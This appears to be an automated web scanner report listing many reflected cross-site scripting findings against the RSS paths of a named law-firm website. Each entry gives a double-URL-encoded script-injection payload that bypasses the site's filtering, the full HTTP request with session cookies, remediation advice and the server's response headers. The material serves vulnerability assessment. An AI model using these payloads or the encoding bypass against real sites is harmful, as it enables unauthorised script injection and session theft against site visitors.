Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872 was submitted in the REST URL parameter 3. This input was echoed as 14f97"><script>alert(1)</script>df3bd752872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Environment__Safety14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 was submitted in the REST URL parameter 4. This input was echoed as a8458"><script>alert(1)</script>9d96a6b3a12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Environment__Safety/rss.xmla8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2 was submitted in the REST URL parameter 1. This input was echoed as 53bc2"><script>alert(1)</script>4c6054d33b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2/practices/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82 was submitted in the REST URL parameter 2. This input was echoed as 99d18"><script>alert(1)</script>a1c0da64d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21 was submitted in the REST URL parameter 3. This input was echoed as de427"><script>alert(1)</script>3670bef0e21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Food__Drug_and_Product_Safetyde427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 was submitted in the REST URL parameter 4. This input was echoed as f92a2"><script>alert(1)</script>41efcd82b21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Food__Drug_and_Product_Safety/rss.xmlf92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06 was submitted in the REST URL parameter 1. This input was echoed as a6fba"><script>alert(1)</script>a4316059e06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssa6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06/practices/Franchise/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0 was submitted in the REST URL parameter 2. This input was echoed as b78b0"><script>alert(1)</script>9778950fc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesb78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0/Franchise/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8 was submitted in the REST URL parameter 3. This input was echoed as d4984"><script>alert(1)</script>61790d4d9a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Franchised4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b was submitted in the REST URL parameter 4. This input was echoed as 214b4"><script>alert(1)</script>273c67fee0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Franchise/rss.xml214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2 was submitted in the REST URL parameter 1. This input was echoed as f2dde"><script>alert(1)</script>ed620a3a2e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssf2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2/practices/Government_Contracts/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6 was submitted in the REST URL parameter 2. This input was echoed as ad839"><script>alert(1)</script>b98612c93e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6/Government_Contracts/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2 was submitted in the REST URL parameter 3. This input was echoed as a8ea8"><script>alert(1)</script>7c519c08fc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Government_Contractsa8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb was submitted in the REST URL parameter 4. This input was echoed as 9c8b4"><script>alert(1)</script>4f8e8ef06bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Government_Contracts/rss.xml9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86 was submitted in the REST URL parameter 1. This input was echoed as 86cb4"><script>alert(1)</script>fd584c5ec86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86/practices/Health_Care/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf was submitted in the REST URL parameter 2. This input was echoed as cc67c"><script>alert(1)</script>d7658866ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicescc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf/Health_Care/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4 was submitted in the REST URL parameter 3. This input was echoed as f87dc"><script>alert(1)</script>ee3d1a37ca4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Health_Caref87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 was submitted in the REST URL parameter 4. This input was echoed as f1cbf"><script>alert(1)</script>efc92306738 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Health_Care/rss.xmlf1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532 was submitted in the REST URL parameter 1. This input was echoed as 7953a"><script>alert(1)</script>a4cf2c1a532 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
